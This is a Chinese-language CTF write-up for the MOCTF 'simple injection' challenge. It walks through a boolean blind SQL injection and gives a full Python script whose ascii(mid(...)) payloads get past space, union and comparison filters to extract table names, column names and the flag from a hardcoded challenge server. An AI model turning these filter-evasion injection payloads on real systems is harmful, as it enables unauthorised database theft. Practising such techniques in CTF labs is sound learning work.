MOCTF 简单注入
简单注入,可真的是太“简单”了
打开页面,查看源码:
传入id=1,依次输入id=1,id=2,id=3有一些提示,说数据库的长度大于20,而且flag就在这个库内
开始检测注入,,,,,
经过一系列的检查之后发现:
/**/,空格,substr(),union,or,>(后面写脚本的时候才知道>过滤了,套~)等…都被过滤了
union都被过滤了,报错注入实现不了,但是ascii函数和mid函数和hex函数没有被过滤
mid函数和substr差不多,盲注跑脚本!!!
说实话,这个脚本真的写得头皮发麻,一路的坎坷!!!
先附上脚本:
import requests
import io
import sys
'''
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码,否则s.text不能输出
url = "http://119.23.73.3:5004/?id=1'and(length(database()))!='20"
s = requests.get(url)
s.encoding = 'utf-8'
content = s.content
#检验是否成功
if 'Hello' in s.text:
s.encoding = 'gbk'
print(s.text)
#构造sql注入语句
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20
'''
#-----------------------------二分法不能用,>被过滤了,套他的猴子!!!!----------------------------------
#-----------------------------所以这个二分脚本写得有没有错还不清楚。。。。。----------------------------------
'''
url = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))>%s)and(length(database()))!='20"
ss = ""
for i in range(1,30):
maxx = 126
minx = 32
flag = 0
while abs(maxx-minx)>1:
mid = (maxx + minx)/2
payload = url%(str(i),str(mid))
s = requests.get(payload)
if 'Hello' in s.text:
flag = 1
min = mid
else:
max = mid
if(flag):
ss += chr(mid)
else:
break
print(ss)
'''
#-----------------------------跑得太慢了,受不了-------------------------------
url = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)and(length(database()))!='20"
url2 = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s)and(length(database()))!='20"
url3 = "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s)and(length(database()))!='20"
ss = ""
for i in range(1,50):
for j in range(32,126):
payload = url3%(str(i),str(j))
#print(payload)
s = requests.get(payload)
if 'Hello' in s.text:
ss += chr(j)
print(ss)
break
url是跑表名的,url2是跑列名的,url3直接爆flag的,,,,,,截图如下:
第一次编写脚本跑web,花的时间还不是一般的多,以后继续学习,继续努力!!!